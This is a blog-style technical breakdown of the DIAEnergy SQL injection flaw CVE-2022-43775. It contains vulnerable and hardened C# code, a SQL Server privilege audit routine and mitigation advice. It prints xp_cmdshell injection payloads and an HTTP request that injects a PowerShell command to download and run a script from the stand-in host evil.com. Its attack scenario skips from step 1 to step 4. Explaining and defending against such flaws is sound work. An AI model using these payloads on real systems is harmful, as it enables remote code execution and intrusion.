In late 2022, cybersecurity researchers discovered a critical vulnerability, tracked as CVE-2022-43775, in the DIAEnergy v1.9 system developed by Delta Electronics. The issue resides in the HICT_Loop class, which is responsible for handling numerous database operations inside the application. This flaw is a classic case of SQL Injection—but with a potentially devastating twist: it can be abused to execute malicious code remotely.

In this post, we'll break down how this vulnerability works, its exploitability, and what it means for organizations using DIAEnergy. We'll provide code snippets, references to original advisories, and a simple demonstration of how an attack might unfold.

What is DIAEnergy?

DIAEnergy is a comprehensive "Energy Management System" developed by Delta Electronics, used by manufacturing plants, data centers, and other large facilities to monitor and optimize their energy usage. Due to its operational importance, this platform is often connected to critical infrastructure networks.

Under the Hood: The HICT_Loop Class

At the heart of DIAEnergy is the HICT_Loop class. This class takes user input and constructs SQL queries to interact with the backend database, such as fetching energy usage logs or device settings. Unfortunately, DIAEnergy v1.9 does not properly sanitize this user input in some endpoints exposed by HICT_Loop.

The Vulnerability: SQL Injection

SQL Injection occurs when an attacker sends malicious SQL code as input to an application's database query, allowing them to read, modify, or even delete data—and, in some cases, execute commands on the underlying system.

In the case of CVE-2022-43775, an attacker can exploit the bug by supplying crafted input to certain parameters handled by HICT_Loop. For example, an unauthenticated attacker could submit the following payload:

'; EXEC xp_cmdshell('whoami'); --

If the application inserts this input directly into a SQL statement like

string query = "SELECT * FROM DeviceLogs WHERE deviceID = '" + userInput + "'";

...then the attacker's payload closes the existing SQL string and executes arbitrary commands, such as whoami, on the operating system if dangerous Extended Stored Procedures like xp_cmdshell are enabled (common with some legacy MSSQL setups).

Proof-of-Concept Exploit

Here's a simplified code snippet showing what the vulnerable code might look like in C# (since DIAEnergy is a Windows-based system):

```csharp
using System.Data;
using System.Data.SqlClient;

// BAD: Vulnerable to SQL Injection. conStr is the application's database
// connection string (a field of the enclosing class).
public DataTable GetDeviceLogs(string deviceID)
{
    // The untrusted deviceID value is spliced straight into the SQL text.
    string query = $"SELECT * FROM DeviceLogs WHERE deviceID = '{deviceID}'";
    using (var connection = new SqlConnection(conStr))
    using (var command = new SqlCommand(query, connection))
    {
        connection.Open();
        var adapter = new SqlDataAdapter(command);
        var results = new DataTable();
        adapter.Fill(results);
        return results;
    }
}
```

If you supply a malicious value in deviceID, such as

'; EXEC xp_cmdshell('calc.exe'); --

the Windows Calculator can pop up on the server. An attacker could easily swap that call out for downloading malware, creating a reverse shell, or stealing data.
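As an added example (not Delta's code and not taken from the advisories), here is a hardened form of the GetDeviceLogs method above. It uses the same DeviceLogs table and deviceID column as the snippet, assumes `conStr` is a connection string handed to the class, and validates the ID against a format (alphanumerics, underscore, hyphen, at most 32 characters) that is my assumption, not DIAEnergy's actual ID scheme.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public class DeviceLogRepository
{
    // Connection string supplied by the caller (assumption; not DIAEnergy's own field name).
    private readonly string conStr;

    public DeviceLogRepository(string connectionString)
    {
        conStr = connectionString;
    }

    // GOOD: the user-supplied value never becomes part of the SQL text.
    public DataTable GetDeviceLogs(string deviceID)
    {
        // Defence in depth: reject anything that does not look like a device ID
        // before it reaches the database. The pattern is an assumed ID format.
        if (deviceID == null || !Regex.IsMatch(deviceID, @"^[A-Za-z0-9_\-]{1,32}$"))
            throw new ArgumentException("deviceID has an unexpected format", nameof(deviceID));

        // The SQL text is a constant; the value travels separately as a parameter.
        const string query = "SELECT * FROM DeviceLogs WHERE deviceID = @deviceID";

        using (var connection = new SqlConnection(conStr))
        using (var command = new SqlCommand(query, connection))
        {
            // A typed parameter is compared literally against the column, so an
            // input like "'; EXEC xp_cmdshell('whoami'); --" can never terminate
            // the statement, whether or not xp_cmdshell is enabled.
            command.Parameters.Add("@deviceID", SqlDbType.NVarChar, 32).Value = deviceID;

            connection.Open();
            var results = new DataTable();
            using (var adapter = new SqlDataAdapter(command))
            {
                adapter.Fill(results);
            }
            return results;
        }
    }
}
```

The parameter is the actual fix; the regular-expression check only narrows what reaches the database and gives you a clean place to log rejected input. Parameterization does not depend on knowing every quoting trick, which is why it is preferred over escaping the value yourself.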

Real-World Attack Scenario

1. Attacker discovers the DIAEnergy v1.9 web interface (or observes its traffic on the network).

```http
POST /HICT_Loop/GetDeviceLogs HTTP/1.1
Host: target.example.com

deviceID='; EXEC xp_cmdshell('powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"'); --
```

4. DIAEnergy executes the payload, running code fetched from the attacker's server. The attacker gains full control of the device.

References and More Information

- Delta Electronics DIAEnergy Product Page
- CVE-2022-43775 at NVD
- ICS-CERT Advisory

How to Mitigate

- Update DIAEnergy: Delta Electronics has published security updates for this and other issues. Always update to the latest version.
- Sanitize Inputs: All user input must be strictly validated, parameterized, and sanitized before forming any SQL queries.
- Restrict Database Privileges: Run the application under a least-privilege database login, and leave xp_cmdshell disabled (and its EXECUTE permission ungranted) unless absolutely necessary.
- Monitor for Abuse: Enable intrusion detection systems and monitor for unusual SQL or OS command activity.
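To make the privilege and monitoring items checkable, here is an added C# audit routine (not part of DIAEnergy and not from the advisories) that runs three read-only queries using the same credentials the application connects with: whether xp_cmdshell is enabled in sys.configurations, whether the login is a member of sysadmin, and whether it holds EXECUTE on master.dbo.xp_cmdshell. The class name `SqlHardeningAudit` and the connection string passed in are assumptions; the catalog views and built-in functions it queries are standard SQL Server.

```csharp
using System;
using System.Collections.Generic;
using System.Data.SqlClient;

public static class SqlHardeningAudit
{
    // Runs read-only checks with the application's own connection string and
    // returns one finding per risky condition; an empty list means nothing flagged.
    public static List<string> Run(string conStr)
    {
        var findings = new List<string>();

        using (var connection = new SqlConnection(conStr))
        {
            connection.Open();

            // 1. Is xp_cmdshell enabled at the instance level? If so, any SQL
            //    injection reachable by a privileged login becomes OS command execution.
            if (ScalarIsOne(connection,
                "SELECT CAST(value_in_use AS int) FROM sys.configurations WHERE name = 'xp_cmdshell'"))
                findings.Add("xp_cmdshell is enabled on this instance.");

            // 2. Does the login the application uses belong to sysadmin?
            if (ScalarIsOne(connection, "SELECT IS_SRVROLEMEMBER('sysadmin')"))
                findings.Add("Application login is a member of sysadmin; use a least-privilege login.");

            // 3. Has the login been granted EXECUTE on xp_cmdshell directly?
            if (ScalarIsOne(connection,
                "SELECT HAS_PERMS_BY_NAME('master.dbo.xp_cmdshell', 'OBJECT', 'EXECUTE')"))
                findings.Add("Application login can EXECUTE master.dbo.xp_cmdshell.");
        }

        return findings;
    }

    // Executes a scalar query and treats NULL/DBNull as "not flagged".
    private static bool ScalarIsOne(SqlConnection connection, string sql)
    {
        using (var cmd = new SqlCommand(sql, connection))
        {
            object value = cmd.ExecuteScalar();
            if (value == null || value == DBNull.Value)
                return false;
            return Convert.ToInt32(value) == 1;
        }
    }
}
```

Running this from a scheduled job and alerting on any non-empty result turns the "restrict privileges" advice into something you can verify after every deployment or database change, rather than a one-time checklist item.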

Final Thoughts

CVE-2022-43775 is a critical reminder about the importance of never trusting user input and following security best practices when building enterprise software. If you run DIAEnergy in your organization, patch immediately and audit all database-facing code. SQL Injection remains one of the most widely exploited vulnerabilities—don't let your systems be next.


*This post is an original summary and technical breakdown based on public disclosures and our analysis. For the latest updates and mitigations, check the links above.*

Timeline

Published on: 10/26/2022 18:15:00 UTC
Last modified on: 10/28/2022 01:54:00 UTC